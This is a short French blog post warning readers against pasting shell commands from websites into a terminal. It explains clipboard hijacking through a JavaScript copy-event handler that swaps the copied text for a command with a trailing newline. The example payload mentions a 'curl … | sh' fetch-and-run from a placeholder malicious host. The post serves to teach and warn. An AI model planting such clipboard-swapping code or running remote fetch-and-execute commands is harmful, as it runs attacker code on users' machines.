Sécurité

Ne pas faire de copier-coller dans votre terminal

Walid ETTAYEB
1 min de lecture
Ne pas faire de copier-coller dans votre terminal

Lorsque vous voyez une commande shell sur Internet, ne la copiez pas dans votre terminal.

Les API de presse-papiers JavaScript modernes permettent à un site Web d'écraser ce qui est ajouté au presse-papiers.

Voici un exemple de la simplicité de cette attaque.

mkdir mon_nouveau_dossier

Notez que vous n'avez même pas besoin de taper ENTER dans votre terminal après avoir collé pour que l'exploit se produise. La charge utile contient commodément une nouvelle ligne de fin qui le fait pour vous !

Voici le JavaScript qui exécute l'exploit:

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://monscriptmalveillant.edu | sh]"\n'
    );
    e.preventDefault();
});

Écrit par

Walid ETTAYEB

Passionné par la technologie, je transforme ma passion en expertise.

Vous pourriez aussi aimer

Appuyez sur ESC pour fermer.

Parcourir les articles par tags populaires

Self-Hosting Sécurité Devops Scripts Astuces
Vous vous êtes abonné avec succès à CodeClan
Parfait ! Ensuite, complétez le paiement pour obtenir un accès complet à tout le contenu premium.
Erreur ! Impossible de s'inscrire. Lien invalide.
Bienvenue ! Vous vous êtes connecté avec succès.
Erreur ! Impossible de se connecter. Veuillez réessayer.
Succès ! Votre compte est entièrement activé, vous avez maintenant accès à tout le contenu.
Erreur ! Le paiement Stripe a échoué.
Succès ! Vos informations de facturation sont mises à jour.
Erreur ! La mise à jour des informations de facturation a échoué.